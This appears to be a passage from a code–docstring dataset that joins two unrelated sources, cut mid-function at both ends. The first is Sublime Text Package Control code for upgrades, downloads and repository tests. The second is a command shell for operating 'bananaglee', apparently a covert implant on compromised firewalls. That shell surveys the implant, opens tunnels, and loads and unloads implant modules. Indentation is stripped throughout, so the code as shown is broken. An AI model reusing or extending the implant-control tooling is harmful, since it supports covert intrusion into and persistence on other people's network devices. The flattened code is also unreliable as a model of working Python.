dirs = ['C:\\Program Files\\Git\\bin', 'C:\\Program Files (x86)\\Git\\bin', 'C:\\Program Files\\TortoiseGit\\bin', 'C:\\Program Files\\Mercurial', 'C:\\Program Files (x86)\\Mercurial', 'C:\\Program Files (x86)\\TortoiseHg', 'C:\\Program Files\\TortoiseHg', 'C:\\cygwin\\bin']
else:
dirs = ['/usr/local/git/bin', '/usr/local/bin']
for dir_ in dirs:
check_binaries.append(os.path.join(dir_, name))
if self.debug:
console_write(u'\n Looking for %s at: "%s"\n ', (self.cli_name, '", "'.join(check_binaries)))
for path in check_binaries:
if (os.path.exists(path) and (not os.path.isdir(path)) and os.access(path, os.X_OK)):
if self.debug:
console_write(u'\n Found %s at "%s"\n ', (self.cli_name, path))
Cli.binary_paths[self.cli_name] = path
return path
if self.debug:
console_write(u'\n Could not find %s on your machine\n ', self.cli_name)
return None
|
':param found_packages:
A list of package names for the packages that were found to be
installed on the machine.
:param found_dependencies:
A list of installed dependencies found on the machine'
| def __init__(self, found_packages, found_dependencies):
| self.installer = PackageInstaller()
self.manager = self.installer.manager
self.load_settings()
self.package_renamer = PackageRenamer()
self.package_renamer.load_settings()
self.auto_upgrade = self.settings.get('auto_upgrade')
self.auto_upgrade_ignore = self.settings.get('auto_upgrade_ignore')
self.load_last_run()
self.determine_next_run()
self.missing_packages = list((set(self.installed_packages) - set(found_packages)))
self.missing_dependencies = list((set(self.manager.find_required_dependencies()) - set(found_dependencies)))
if (self.auto_upgrade and (self.next_run <= time.time())):
self.save_last_run(time.time())
threading.Thread.__init__(self)
|
'Loads the last run time from disk into memory'
| def load_last_run(self):
| self.last_run = None
self.last_run_file = os.path.join(sublime.packages_path(), 'User', 'Package Control.last-run')
if os.path.isfile(self.last_run_file):
with open_compat(self.last_run_file) as fobj:
try:
self.last_run = int(read_compat(fobj))
except ValueError:
pass
|
'Figure out when the next run should happen'
| def determine_next_run(self):
| self.next_run = int(time.time())
frequency = self.settings.get('auto_upgrade_frequency')
if frequency:
if self.last_run:
self.next_run = (int(self.last_run) + ((frequency * 60) * 60))
else:
self.next_run = time.time()
|
'Saves a record of when the last run was
:param last_run:
The unix timestamp of when to record the last run as'
| def save_last_run(self, last_run):
| with open_compat(self.last_run_file, 'w') as fobj:
write_compat(fobj, int(last_run))
|
'Loads the list of installed packages'
| def load_settings(self):
| self.settings = sublime.load_settings(pc_settings_filename())
self.installed_packages = load_list_setting(self.settings, 'installed_packages')
self.should_install_missing = self.settings.get('install_missing')
|
'Installs all packages that were listed in the list of
`installed_packages` from Package Control.sublime-settings but were not
found on the filesystem and passed as `found_packages`. Also installs
any missing dependencies.'
| def install_missing(self):
| if self.missing_dependencies:
total_missing_dependencies = len(self.missing_dependencies)
dependency_s = ('ies' if (total_missing_dependencies != 1) else 'y')
console_write(u'\n Installing %s missing dependenc%s\n ', (total_missing_dependencies, dependency_s))
dependencies_installed = 0
for dependency in self.missing_dependencies:
if self.installer.manager.install_package(dependency, is_dependency=True):
console_write(u'Installed missing dependency %s', dependency)
dependencies_installed += 1
if dependencies_installed:
def notify_restart():
dependency_was = ('ies were' if (dependencies_installed != 1) else 'y was')
show_error(u'\n %s missing dependenc%s just installed. Sublime Text\n should be restarted, otherwise one or more of the\n installed packages may not function properly.\n ', (dependencies_installed, dependency_was))
sublime.set_timeout(notify_restart, 1000)
if ((not self.missing_packages) or (not self.should_install_missing)):
return
total_missing_packages = len(self.missing_packages)
if (total_missing_packages > 0):
package_s = ('s' if (total_missing_packages != 1) else '')
console_write(u'\n Installing %s missing package%s\n ', (total_missing_packages, package_s))
self.manager.list_available_packages()
renamed_packages = self.manager.settings.get('renamed_packages', {})
disabled_packages = []
def disable_packages():
disabled_packages.extend(self.installer.disable_packages(self.missing_packages, 'install'))
sublime.set_timeout(disable_packages, 1)
time.sleep(0.7)
for package in self.missing_packages:
if (package in renamed_packages):
old_name = package
new_name = renamed_packages[old_name]
def update_installed_packages():
self.installed_packages.remove(old_name)
self.installed_packages.append(new_name)
self.settings.set('installed_packages', self.installed_packages)
sublime.save_settings(pc_settings_filename())
sublime.set_timeout(update_installed_packages, 10)
package = new_name
if self.installer.manager.install_package(package):
if (package in disabled_packages):
on_complete = functools.partial(self.installer.reenable_package, package, 'install')
sublime.set_timeout(on_complete, 700)
console_write(u'\n Installed missing package %s\n ', package)
|
'Prints a notice in the console if the automatic upgrade is skipped
due to already having been run in the last `auto_upgrade_frequency`
hours.'
| def print_skip(self):
| last_run = datetime.datetime.fromtimestamp(self.last_run)
next_run = datetime.datetime.fromtimestamp(self.next_run)
date_format = '%Y-%m-%d %H:%M:%S'
console_write(u'\n Skipping automatic upgrade, last run at %s, next run at %s or after\n ', (last_run.strftime(date_format), next_run.strftime(date_format)))
|
'Upgrades all packages that are not currently upgraded to the lastest
version. Also renames any installed packages to their new names.'
| def upgrade_packages(self):
| if (not self.auto_upgrade):
return
self.package_renamer.rename_packages(self.installer)
package_list = self.installer.make_package_list(['install', 'reinstall', 'downgrade', 'overwrite', 'none'], ignore_packages=self.auto_upgrade_ignore)
for package in package_list:
if (package[0] != 'Package Control'):
continue
if self.last_run:
def reset_last_run():
self.save_last_run(self.last_run)
sublime.set_timeout(reset_last_run, 1)
package_list = [package]
break
if (not package_list):
console_write(u'\n No updated packages\n ')
return
console_write(u'\n Installing %s upgrades\n ', len(package_list))
disabled_packages = []
def disable_packages():
packages = [info[0] for info in package_list]
disabled_packages.extend(self.installer.disable_packages(packages, 'upgrade'))
sublime.set_timeout(disable_packages, 1)
time.sleep(0.7)
for info in package_list:
package_name = info[0]
if self.installer.manager.install_package(package_name):
if (package_name in disabled_packages):
on_complete = functools.partial(self.installer.reenable_package, package_name, 'upgrade')
sublime.set_timeout(on_complete, 700)
version = self.installer.manager.get_version(package_name)
console_write(u'\n Upgraded %s to %s\n ', (package_name, version))
|
'Downloads a URL and returns the contents
:param url:
The string URL to download
:param error_message:
The error message to include if the download fails
:param prefer_cached:
If cached version of the URL content is preferred over a new request
:raises:
DownloaderException: if there was an error downloading the URL
:return:
The string contents of the URL'
| def fetch(self, url, error_message, prefer_cached=False):
| is_ssl = (re.search('^https://', url) is not None)
url = update_url(url, self.settings.get('debug'))
if (sys.platform == 'darwin'):
platform = 'osx'
elif (sys.platform == 'win32'):
platform = 'windows'
else:
platform = 'linux'
downloader_precedence = self.settings.get('downloader_precedence', {'windows': ['wininet'], 'osx': ['urllib'], 'linux': ['urllib', 'curl', 'wget']})
downloader_list = downloader_precedence.get(platform, [])
if ((not isinstance(downloader_list, list)) or (len(downloader_list) == 0)):
error_string = text.format(u'\n No list of preferred downloaders specified in the\n "downloader_precedence" setting for the platform "%s"\n ', platform)
show_error(error_string)
raise DownloaderException(error_string)
if ((not self.downloader) or (is_ssl and (not self.downloader.supports_ssl()))):
for downloader_name in downloader_list:
if (downloader_name not in DOWNLOADERS):
error_string = text.format(u'\n The downloader "%s" from the "downloader_precedence"\n setting for the platform "%s" is invalid\n ', (downloader_name, platform))
show_error(error_string)
raise DownloaderException(error_string)
try:
downloader = DOWNLOADERS[downloader_name](self.settings)
if (is_ssl and (not downloader.supports_ssl())):
continue
self.downloader = downloader
break
except BinaryNotFoundError:
pass
if (not self.downloader):
error_string = text.format(u'\n None of the preferred downloaders can download %s.\n\n This is usually either because the ssl module is unavailable\n and/or the command line curl or wget executables could not be\n found in the PATH.\n\n If you customized the "downloader_precedence" setting, please\n verify your customization.\n ', url)
show_error(error_string)
raise DownloaderException(error_string.replace('\n\n', ' '))
url = url.replace(' ', '%20')
hostname = urlparse(url).hostname
if hostname:
hostname = hostname.lower()
timeout = self.settings.get('timeout', 3)
rate_limited_domains = get_cache('rate_limited_domains', [])
if self.settings.get('debug'):
try:
port = (443 if is_ssl else 80)
ipv6_info = socket.getaddrinfo(hostname, port, socket.AF_INET6)
if ipv6_info:
ipv6 = ipv6_info[0][4][0]
else:
ipv6 = None
except socket.gaierror as e:
ipv6 = None
except TypeError as e:
ipv6 = None
try:
ip = socket.gethostbyname(hostname)
except socket.gaierror as e:
ip = unicode_from_os(e)
except TypeError as e:
ip = None
console_write(u'\n Download Debug\n URL: %s\n Timeout: %s\n Resolved IP: %s\n ', (url, str_cls(timeout), ip))
if ipv6:
console_write(u' Resolved IPv6: %s', ipv6, prefix=False)
if (hostname in rate_limited_domains):
error_string = (u'Skipping due to hitting rate limit for %s' % hostname)
if self.settings.get('debug'):
console_write(u' %s', error_string, prefix=False)
raise DownloaderException(error_string)
try:
return self.downloader.download(url, error_message, timeout, 3, prefer_cached)
except RateLimitException as e:
rate_limited_domains.append(hostname)
set_cache('rate_limited_domains', rate_limited_domains, self.settings.get('cache_length'))
console_write(u'\n Hit rate limit of %s for %s. Skipping all futher download\n requests for this domain.\n ', (e.limit, e.domain))
raise
except WinDownloaderException as e:
console_write(u'\n Attempting to use Urllib downloader due to WinINet error: %s\n ', e)
wininet_proxy = (self.downloader.proxy or '')
wininet_proxy_username = (self.downloader.proxy_username or '')
wininet_proxy_password = (self.downloader.proxy_password or '')
http_proxy = self.settings.get('http_proxy', '')
https_proxy = self.settings.get('https_proxy', '')
proxy_username = self.settings.get('proxy_username', '')
proxy_password = self.settings.get('proxy_password', '')
settings = self.settings.copy()
if ((not http_proxy) and wininet_proxy):
settings['http_proxy'] = wininet_proxy
if ((not https_proxy) and wininet_proxy):
settings['https_proxy'] = wininet_proxy
has_proxy = (settings.get('http_proxy') or settings.get('https_proxy'))
if (has_proxy and (not proxy_username) and wininet_proxy_username):
settings['proxy_username'] = wininet_proxy_username
if (has_proxy and (not proxy_password) and wininet_proxy_password):
settings['proxy_password'] = wininet_proxy_password
self.downloader = UrlLibDownloader(settings)
return self.fetch(url, error_message, prefer_cached)
|
'Shows a list of packages that can be turned into a .sublime-package file'
| def show_panel(self):
| self.manager = PackageManager()
self.packages = self.manager.list_packages(unpacked_only=True)
if (not self.packages):
show_error(u'\n There are no packages available to be packaged\n ')
return
show_quick_panel(self.window, self.packages, self.on_done)
|
'Quick panel user selection handler - processes the user package
selection and prompts the user to pick a profile, or just creates the
package file if there are no profiles
:param picked:
An integer of the 0-based package name index from the presented
list. -1 means the user cancelled.'
| def on_done(self, picked):
| self.profile = None
if (picked == (-1)):
return
self.package_name = self.packages[picked]
rules = self.manager.settings.get('package_profiles')
if (not rules):
self.do_create_package()
return
self.profiles = ['Default']
for key in rules.keys():
self.profiles.append(key)
def show_panel():
show_quick_panel(self.window, self.profiles, self.on_done_profile)
sublime.set_timeout(show_panel, 50)
|
'Quick panel user selection handler - processes the package profile
selection and creates the package file
:param picked:
An integer of the 0-based profile name index from the presented
list. -1 means the user cancelled.'
| def on_done_profile(self, picked):
| if (picked == (-1)):
return
if (picked > 0):
self.profile = self.profiles[picked]
self.do_create_package()
|
'Calls into the PackageManager to actually create the package file'
| def do_create_package(self):
| destination = self.get_package_destination()
if self.manager.create_package(self.package_name, destination, profile=self.profile):
self.window.run_command('open_dir', {'dir': destination, 'file': (self.package_name + '.sublime-package')})
|
'Retrieves the destination for .sublime-package files
:return:
A string - the path to the folder to save .sublime-package files in'
| def get_package_destination(self):
| destination = None
if self.profile:
profiles = self.manager.settings.get('package_profiles', {})
if (self.profile in profiles):
profile_settings = profiles[self.profile]
destination = profile_settings.get('package_destination')
if (not destination):
destination = self.manager.settings.get('package_destination')
if (not destination):
destination = os.path.join(os.path.expanduser('~'), 'Desktop')
return destination
|
'Check the key-value pairs of a release for validity.'
| def check_release_key_values(self, data, dependency):
| release_key_types_map = (self.dep_release_key_types_map if dependency else self.pck_release_key_types_map)
for (k, v) in data.items():
self.enforce_key_types_map(k, v, release_key_types_map)
if (k == 'url'):
if dependency:
if ('sha256' not in data):
self.assertRegex(v, '^https://')
else:
self.assertRegex(v, '^http://')
else:
self.assertRegex(v, '^https?://')
elif (k == 'base'):
self.assertRegex(v, self.release_base_regex, 'The base url is badly formatted or invalid')
elif (k == 'sublime_text'):
self.assertRegex(v, '^(\\*|<=?\\d{4}|>=?\\d{4}|\\d{4} - \\d{4})$', 'sublime_text must be `*`, of the form `<relation><version>` where <relation> is one of {<, <=, >, >=} and <version> is a 4 digit number, or of the form `<version> - <version>`')
elif (k == 'platforms'):
if isinstance(v, str_cls):
v = [v]
for plat in v:
self.assertRegex(plat, '^(\\*|(osx|linux|windows)(-x(32|64))?)$')
elif (k == 'date'):
self.assertRegex(v, '^\\d\\d\\d\\d-\\d\\d-\\d\\d \\d\\d:\\d\\d:\\d\\d$')
elif (k == 'url'):
self.assertRegex(v, '^https?://')
elif (k == 'base'):
self.assertRegex(v, self.release_base_regex, 'The base url is badly formatted or invalid')
elif (k == 'tags'):
self.assertTrue(bool(v), '"tags" must be `true` or a string of length>0')
if isinstance(v, str_cls):
self.assertFalse((v == 'true'), 'It is unlikely to specify the prefix "true" use not the boolean `true`')
elif (k == 'branch'):
self.assertNotEqual(v, '', '"branch" must be non-empty')
elif (k == 'sha256'):
self.assertRegex(v, '(?i)^[0-9a-f]{64}$')
|
'A generic error-returning function used by the meta-programming features
of this class.
:param msg:
The error message to return
:param e:
An optional exception to include with the error message'
| def _test_error(self, msg, e=None):
| if e:
if isinstance(e, HTTPError):
self.fail(('%s: %s' % (msg, e)))
else:
self.fail(('%s: %r' % (msg, e)))
else:
self.fail(msg)
|
'Yields tuples of (method, args) to add to a unittest TestCase class.
A meta-programming function to expand the definition of class at run
time, based on the contents of a file or URL.
:param cls:
The class to add the methods to
:param path:
The URL or file path to fetch the repository info from
:param stream:
A file-like object used for diagnostic output that provides .write()
and .flush()'
| @classmethod
def _include_tests(cls, path, stream):
| stream.write(('%s ... ' % path))
stream.flush()
success = False
try:
if (re.match('https?://', path, re.I) is not None):
try:
f = urlopen(path)
source = f.read()
f.close()
except Exception as e:
(yield cls._fail(('Downloading %s failed' % path), e))
return
source = source.decode('utf-8', 'strict')
else:
try:
with _open(path) as f:
source = f.read().decode('utf-8', 'strict')
except Exception as e:
(yield cls._fail(('Opening %s failed' % path), e))
return
if (not source):
(yield cls._fail(('%s is empty' % path)))
return
try:
data = json.loads(source)
except Exception as e:
(yield cls._fail(('Could not parse %s' % path), e))
return
if ('schema_version' not in data):
(yield cls._fail(('No schema_version found in %s' % path)))
return
schema = data['schema_version']
if ((schema != '3.0.0') and (float(schema) not in (1.0, 1.1, 1.2, 2.0))):
(yield cls._fail(('Unrecognized schema version %s in %s' % (schema, path))))
return
success = True
if (schema != '3.0.0'):
stream.write(('skipping (schema version %s)' % data['schema_version']))
cls.skipped_repositories[schema] += 1
return
else:
stream.write('done')
finally:
if (not success):
stream.write('failed')
stream.write('\n')
(yield (cls._test_repository_keys, (path, data)))
if ('packages' in data):
for package in data['packages']:
(yield (cls._test_package, (path, package)))
package_name = get_package_name(package)
if ('releases' in package):
for release in package['releases']:
(yield (cls._test_release, (('%s (%s)' % (package_name, path)), release, False, False)))
if ('includes' in data):
for include in data['includes']:
i_url = urljoin(path, include)
for test in cls._include_tests(i_url, stream):
(yield test)
|
'Generates a (method, args) tuple that returns an error when called.
Allows for defering an error until the tests are actually run.'
| @classmethod
def _fail(cls, *args):
| return (cls._test_error, args)
|
'Writes dianostic output to a file-like object.
:param stream:
Must have the methods .write() and .flush()
:param string:
The string to write - a newline will NOT be appended'
| @classmethod
def _write(cls, stream, string):
| stream.write(string)
stream.flush()
|
'set_tunnel [True|False]
sets if the script will handle tunneling for you'
| def do_set_tunnel(self, option):
| if (option.lower() == 'true'):
self.logger.info('Script will handle tunneling for you')
self.sfile['do_tunnel'] = True
elif (option.lower() == 'false'):
self.logger.info('Script will not handle tunneling for you')
self.sfile['do_tunnel'] = False
else:
self.logger.error('You made an invalid selection')
|
'set_shelve [KEY] [VALUE]
sets KEY to VALUE in the shelve file'
| def do_set_shelve(self, option):
| self.logger.debug('user ran set_shelve')
space = option.find(' ')
if (space == (-1)):
self.logger.error('could not determine your key and value')
return
key = option[:space]
value = option[(space + 1):]
if (key == ''):
self.logger.error('could not determine your key')
return
if (value == ''):
self.logger.error('could not determine your value')
return
if (self.sfile.has_key(key) == True):
self.sfile[key] = value
self.logger.info('Updating shelve file')
self.logger.info(('Key: ' + str(key)))
self.logger.info(('Value: ' + str(value)))
else:
self.logger.error('key does not exist, creating')
self.sfile[key] = value
self.logger.info(('Key: ' + str(key)))
self.logger.info(('Value: ' + str(value)))
|
'show_settings
displays all of the current configuration settings'
| def do_show_settings(self, option):
| self.logger.debug('user ran show_settings')
tools.show_settings(self.sfile, option, self.logger)
|
'show_tools
shows the support tools and versions'
| def do_show_tools(self, option):
| self.logger.debug('user ran show_tools')
for i in self.config.get('main', 'tools').split(','):
self.logger.info(('tool : ' + str(i)))
self.logger.info(('versions : ' + str(self.config.get(i, 'versions'))))
|
'bananaglee [VERSION]
selects the bananaglee VERSION to use'
| def do_bananaglee(self, version):
| self.logger.debug('user ran bananaglee')
if (version == ''):
self.logger.error('please specify a version')
elif (version in self.bg_versions):
self.logger.debug(('selected bananaglee ' + str(version)))
self.sfile['tool'] = 'bananaglee'
self.sfile['version'] = version
bananaglee_mod = bananaglee.BananaGlee(self.sfile, self.logger)
bananaglee_mod.cmdloop()
else:
self.logger.error(('made an invalid selection: ' + str(version)))
|
'add_iprange [IP NETMASK] or [IP/CIDR]
will all an IP range to use for tunneling'
| def do_add_iprange(self, input):
| self.logger.debug('user ran add_iprange')
tools.cidr(self.sfile, self.logger, input)
self.logger.debug('output from cidr')
self.logger.debug(self.sfile['iprange'])
|
'show_iprange
will print out all the IPs to use for communication'
| def do_show_iprange(self, input):
| self.logger.debug('user ran show_iprange')
if (self.sfile.has_key('iprange') == False):
self.logger.info('I do not have any IPs to use for communication')
else:
self.logger.info(self.sfile['iprange'])
|
'delete_iprange
deletes all the IPs to use for communication'
| def do_delete_iprange(self, input):
| self.logger.debug('user ran delete_iprange')
if (self.sfile.has_key('iprange') == False):
self.logger.info('I do not have any IPs to use for communication')
else:
self.logger.debug('current IPs in list: ')
self.logger.debug(self.sfile['iprange'])
self.logger.info('removing all IPs')
self.sfile['iprange'] = []
self.logger.debug(('empty ip list: ' + str(self.sfile['iprange'])))
|
'exit
exits the program'
| def do_exit(self, line):
| self.sfile['auto'] = False
self.sfile['auto_start'] = False
self.sfile['auto_end'] = False
self.logger.debug('exiting')
self.logger.debug(self.sfile)
self.sfile.close()
sys.exit()
|
'quit
quits the current context'
| def do_quit(self, line):
| self.sfile['auto'] = False
self.sfile['auto_start'] = False
self.sfile['auto_end'] = False
self.logger.debug('exiting')
self.logger.debug(self.sfile)
self.sfile.close()
return True
|
'Intalize variables'
| def __init__(self, shelve_file, logger):
| cmd.Cmd.__init__(self)
self.sfile = shelve_file
name = ('bananaglee' + self.sfile['version'])
self.logger = logger
self.prompt = (('BG' + self.sfile['version']) + '>>')
self.logger.debug('sfile contents:')
for i in self.sfile:
self.logger.debug(((i + ' : ') + str(self.sfile[i])))
self.tools_config = ConfigParser.ConfigParser()
self.tools_config.read(os.path.join(self.sfile['script_dir'], 'tools.cfg'))
try:
self.sfile['lp_bin'] = self.tools_config.get((str(self.sfile['tool']) + str(self.sfile['version'])), 'lp')
except:
self.logger.debug(('could not get lp from banananaglee' + str(self.sfile['version'])))
self.sfile['timestamp'] = tools.timeStamp()
(self.sfile['lp_dir'], tmp) = os.path.split(self.sfile['lp_bin'])
self.sfile['logs_to_process'] = os.path.join(self.sfile['log_dir'], ((self.sfile['hostname'] + '.') + self.sfile['target']))
self.sfile['logfile'] = os.path.join(self.sfile['log_dir'], (((('BG_log_' + str(self.sfile['hostname'])) + '.') + str(self.sfile['target'])) + '.log'))
if (not os.path.exists(self.sfile['logs_to_process'])):
os.makedirs(self.sfile['logs_to_process'])
if (self.sfile.has_key('lp') == True):
self.logger.debug('lp ip already exists')
else:
self.sfile['lp'] = '127.0.0.1'
if (self.sfile.has_key('implant') == True):
self.logger.debug('implant ip already exists')
else:
self.sfile['implant'] = '127.0.0.1'
if (self.sfile.has_key('idkey') == True):
self.logger.debug('idkey already exists')
if (os.path.isfile(self.sfile['idkey']) == False):
self.logger.error(('Your keyfile does not exist at: ' + str(self.sfile['idkey'])))
else:
self.sfile['idkey'] = 'idkey'
self.sfile['sport'] = tools.newPort()
self.sfile['dport'] = tools.newPort()
if (tools.timeStamp().split('_')[0] == self.sfile['timestamp'].split('_')[0]):
pass
else:
self.sfile['survey'] = False
self.logger.info(('starting bananaglee ' + self.sfile['version']))
self.logger.info(('LP IP: ' + self.sfile['lp']))
self.logger.info(('Implant IP: ' + self.sfile['implant']))
self.logger.info(('IDKey : ' + self.sfile['idkey']))
self.logger.debug(('Source Port: ' + str(self.sfile['sport'])))
self.logger.debug(('Destination Port: ' + str(self.sfile['dport'])))
os.chdir(self.sfile['lp_dir'])
if (self.sfile.has_key('uploaded_mod_list') == True):
self.uploaded_mod_list = self.sfile['uploaded_mod_list']
else:
self.uploaded_mod_list = []
if (self.sfile.has_key('persistent_modules') == False):
self.sfile['persistent_modules'] = []
if (self.sfile['auto'] == True):
if (self.sfile['auto_start'] == True):
self.do_survey(' ')
if ('packetToolkit' in self.sfile['uploaded_mod_list']):
self.logger.info('PTK is already here')
self.sfile['auto_PTK'] = False
else:
self.logger.info('PTK not present, uploading')
self.sfile['auto_PTK'] = True
self.do_load('packetToolkit')
self.sfile['tunnel'] = True
print self.sfile['tunnel']
print self.sfile['current_rule']
tunnel_mod = tunnel.Tunnel(self.sfile, self.logger)
tunnel_mod.cmdloop()
self.do_quit(' ')
elif (self.sfile['auto_end'] == True):
self.do_set_survey(' ')
if ('packetToolkit' in self.sfile['persistent_modules']):
self.logger.info('PTK is a persistent module')
else:
self.logger.info('unloading PTK')
self.do_unload('packetToolkit')
tools.resetAuto(self.sfile, self.logger)
sys.exit()
|
'show_settings
prints out the current settings'
| def do_show_settings(self, option):
| tools.show_settings(self.sfile, option, self.logger)
|
'survey - preforms a survey, interface info/config/arp'
| def do_survey(self, line):
| self.logger.debug('user ran survey')
self.logger.info('running survey')
if (tools.checks(self.sfile, self.logger) == False):
print tools.show_settings(self.sfile, ' ')
self.logger.error('missing required parameters')
return False
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
self.logger.debug(str(command))
temp_counter = 0
found_file = False
while (found_file == False):
if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + '_BG_survey_') + str(temp_counter)) + '_firewall.log'))) == True):
temp_counter += 1
else:
logfile = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + '_BG_survey_') + str(temp_counter)) + '_firewall.log'))
found_file = True
child = pexpect.spawn(command)
plogfile = file(logfile, 'a')
child.logfile = plogfile
self.logger.info('parsing results, please wait')
self.logger.info(('You can check ' + str(logfile)))
'\n DCTB DCTB Add error handling:\n DCTB DCTB timeout issues\n DCTB DCTB talking to wrong version\n DCTB DCTB '
try:
child.sendline('1')
child.expect('BG#', timeout=120)
child.sendline('10')
child.expect('BG#', timeout=120)
child.sendline('11')
child.expect('BG#', timeout=120)
child.sendline('12')
child.expect('BG#', timeout=120)
child.sendline('31')
child.sendline('q')
child.expect('BG#', timeout=120)
child.sendline('9')
child.expect('BG#', timeout=120)
child.sendline('0')
except:
self.logger.exception('survey failed out')
with open(logfile, 'r') as f:
output = f.readlines()
c = 0
mod_start = 0
uptime = 0
mod_list = 0
for i in output:
self.logger.debug(str(i.rstrip('\r\n')))
if ('Connection Established to Implant' in i):
implant_id = c
self.logger.debug(('found implant id at ' + str(c)))
self.logger.debug(str(i))
elif ('OS Version' in i):
os_version = c
self.logger.debug(('found the os version at ' + str(c)))
self.logger.debug(str(i))
elif ('Implant Version' in i):
implant_version = c
self.logger.debug(('found the implant version at ' + str(c)))
self.logger.debug(str(i))
elif ('Uptime' in i):
uptime = c
self.logger.debug(('found the uptime at ' + str(c)))
self.logger.debug(str(i))
elif ('Printing the interface info and security levels' in i):
int_start = c
self.logger.debug(('found the start of the interface info at ' + str(c)))
self.logger.debug(str(i))
elif ('Module Name Version' in i):
mod_start = c
self.logger.debug(('found the start of module info at ' + str(c)))
self.logger.debug(str(i))
elif ('###################' in i):
mod_list_start = (c + 4)
self.logger.debug(('found the start of the module list at ' + str((c + 4))))
self.logger.debug(i)
c += 1
int_end_tmp = 0
for i in output[int_start:(int_start + 20)]:
if ('BG#' in i):
int_end = (int_end_tmp + int_start)
self.logger.debug(('found the end of the interface information at ' + str(int_end)))
self.logger.debug(str(i))
else:
int_end_tmp += 1
if (mod_start != 0):
mod_end_tmp = 0
for i in output[mod_start:(mod_start + 20)]:
if ('BG#' in i):
mod_end = (mod_end_tmp + mod_start)
self.logger.debug(('found the end of the loaded modules at ' + str(mod_end)))
self.logger.debug(str(i))
else:
mod_end_tmp += 1
if (mod_list_start != 0):
mod_list_end_temp = 0
for i in output[mod_list_start:(mod_list_start + 20)]:
if ('# Select' in i):
mod_list_end = (mod_list_end_temp + mod_list_start)
self.logger.debug(('found the end of the module list at ' + str(mod_list_end)))
self.logger.debug(str(i))
else:
mod_list_end_temp += 1
module_list = output[mod_list_start:mod_list_end]
uploaded_modlist_tmp = []
self.logger.info('Survey Information')
try:
self.logger.info((' Implant ID: ' + str(output[implant_id].split(' ')[4]).rstrip('\r\n')))
except:
self.logger.exception('could not determine the implant id')
try:
self.logger.info(output[os_version].rstrip('\r\n'))
except:
self.logger.exception('could not determine the OS')
try:
self.logger.info(output[implant_version].rstrip('\r\n'))
except:
self.logger.exception('could not determine the implant version')
try:
if (uptime != 0):
self.logger.info(output[uptime].rstrip('\r\n'))
except:
self.logger.exception('could not determine the uptime')
try:
if (mod_start != 0):
module_info = output[mod_start:mod_end]
end = False
for i in module_info[:(-1)]:
for j in i.split(' '):
if (j in self.sfile['mod_num_dict']):
uploaded_modlist_tmp.append(j)
if ('BG#' in i):
end = True
if (end == False):
self.logger.info(i.rstrip('\r\n'))
else:
self.logger.info('No modules are currently uploaded')
except:
self.logger.exception('could not get the module information')
try:
interface_info = output[int_start:(int_end + 1)]
interface_info_out = []
for i in interface_info:
self.logger.info(i.rstrip('\r\n'))
except:
self.logger.exception('could not get the interface information')
try:
mod_num_dict = {}
self.logger.info('List of modules that can be uploaded')
for i in module_list:
format = i.rstrip('\r\n')[1:]
mod_array = filter(None, format.split(' '))
if (len(mod_array) == 3):
self.logger.info(mod_array[1])
number = mod_array[0]
mod_num_dict[mod_array[1]] = number[:(-1)]
self.logger.debug(mod_num_dict)
self.sfile['mod_num_dict'] = mod_num_dict
for i in mod_num_dict:
if (self.sfile.has_key(i) == False):
self.sfile[i] = {}
except:
self.logger.exception('could not build module dictonary')
self.sfile['uploaded_mod_list'] = uploaded_modlist_tmp
plogfile.close()
self.sfile['survey'] = True
tools.closeTunnel(self.sfile, tunnel_number, self.logger)
|
'show_uploadable_modules
displays the modules that can be uploaded'
| def do_show_uploadable_modules(self, option):
| self.logger.debug('user ran show_uploadable_modules')
self.logger.info('List of modules that can be uploaded')
try:
for i in self.sfile['mod_num_dict']:
self.logger.info(i)
except:
self.logger.exception('could not read mod_num_dict from shelve')
|
'tunnel [OPTION]
calls program to manage tunnels
option: simple advanced'
| def do_tunnel(self, option):
| self.logger.debug('user ran tunnel')
if (self.sfile['survey'] == False):
self.logger.error('survey had not been completed, please run survey')
return
if ('packetToolkit' in self.sfile['uploaded_mod_list']):
pass
else:
self.logger.error('your tunnel module is not uploaded')
return
self.logger.info((('Starting tunnel in ' + str(option)) + ' mode'))
if (option == ''):
option = 'simple'
elif (option == 'simple'):
option = 'simple'
else:
option = 'advanced'
self.sfile['mode'] = option
tunnel_mod = tunnel.Tunnel(self.sfile, self.logger)
tunnel_mod.cmdloop()
|
'unload [module]
deactivates and removes a module'
| def do_unload(self, module):
| self.logger.debug(('user ran unload ' + str(module)))
if (self.sfile['survey'] == False):
self.logger.error('survey had not been completed, please run survey')
return
if (module in self.sfile['uploaded_mod_list']):
pass
else:
self.logger.error((('module: ' + str(module)) + ' is not an uploaded module'))
self.logger.info('Current uploaded modules are: ')
if (len(self.sfile['uploaded_mod_list']) == 0):
self.logger.info('I do not know of any uploaded modules')
else:
for i in self.sfile['uploaded_mod_list']:
self.logger.info(i)
return
command_id = self.tools_config.get(('bananaglee' + str(self.sfile['version'])), (module + '_ID'))
self.logger.debug(('command id: ' + str(command_id)))
self.logger.info((('unloading the ' + str(module)) + ' module'))
tunnel_number = tools.openTunnel(self.sfile, self.logger)
command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + str(self.sfile['logs_to_process']))
self.logger.debug(command)
temp_counter = 0
found_file = False
while (found_file == False):
if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))) == True):
temp_counter += 1
else:
log_file = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))
found_file = True
self.logger.debug(('log file: ' + log_file))
child = pexpect.spawn(command)
logfile = file(log_file, 'a')
child.logfile = logfile
' ADD ERROR CHECKING '
try:
child.sendline('1')
child.expect('BG#', timeout=120)
